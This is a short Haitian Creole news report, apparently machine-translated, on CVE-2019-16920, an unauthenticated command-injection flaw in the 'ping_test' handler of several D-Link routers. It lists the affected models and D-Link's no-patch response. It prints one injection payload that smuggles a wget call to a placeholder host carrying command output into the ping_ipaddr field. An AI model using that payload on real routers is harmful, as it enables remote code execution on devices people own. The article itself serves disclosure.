Vilnerabilite eksplwatasyon adistans nan D-Link routeurs

Nan D-Link routeurs san fil idantifye vilnerabilite danjere (CVE-2019–16920), ki pèmèt ou adistans egzekite kòd sou bò aparèy la lè w voye yon demann espesyal bay moun k ap okipe "ping_test" la, ki aksesib san otantifikasyon.

Enteresan, dapre devlopè firmwèr yo, apèl la "ping_test" ta dwe egzekite sèlman apre otantifikasyon, men an reyalite yo rele li nan nenpòt ka, kèlkeswa antre nan koòdone entènèt la. An patikilye, lè w jwenn aksè nan script apply_sec.cgi a epi pase paramèt "action=ping_test", script la redireksyon nan paj otantifikasyon an, men an menm tan an fè aksyon ki asosye ak ping_test. Pou egzekite kòd la, yo te itilize yon lòt vilnerabilite nan ping_test tèt li, ki rele sèvis piblik ping la san yo pa byen tcheke kòrèkteman adrès IP voye pou tès la. Pou egzanp, pou rele sèvis piblik wget la epi transfere rezilta kòmandman "echo 1234" nan yon lame ekstèn, jis presize paramèt "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://". test.test/?$(echo 1234)".

Vilnerabilite eksplwatasyon adistans nan D-Link routeurs

Prezans vilnerabilite a te konfime ofisyèlman nan modèl sa yo:

  • DIR-655 ak firmwèr 3.02b05 oswa plis;
  • DIR-866L ak firmwèr 1.03b04 oswa plis;
  • DIR-1565 ak firmwèr 1.01 oswa plis;
  • DIR-652 (pa gen okenn enfòmasyon sou vèsyon firmwèr ki gen pwoblèm yo bay)

Peryòd sipò pou modèl sa yo deja ekspire, kidonk D-Link deklare, ki pa pral lage mizajou pou yo elimine vilnerabilite a, pa rekòmande pou sèvi ak yo epi li konseye ranplase yo ak nouvo aparèy. Kòm yon solisyon sekirite, ou ka limite aksè nan koòdone entènèt la nan adrès IP ou fè konfyans sèlman.

Li te pita dekouvri ke vilnerabilite a te tou afekte modèl DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 ak DIR-825, plan pou pibliye mizajou yo poko konnen.

Sous: opennet.ru

Add nouvo kòmantè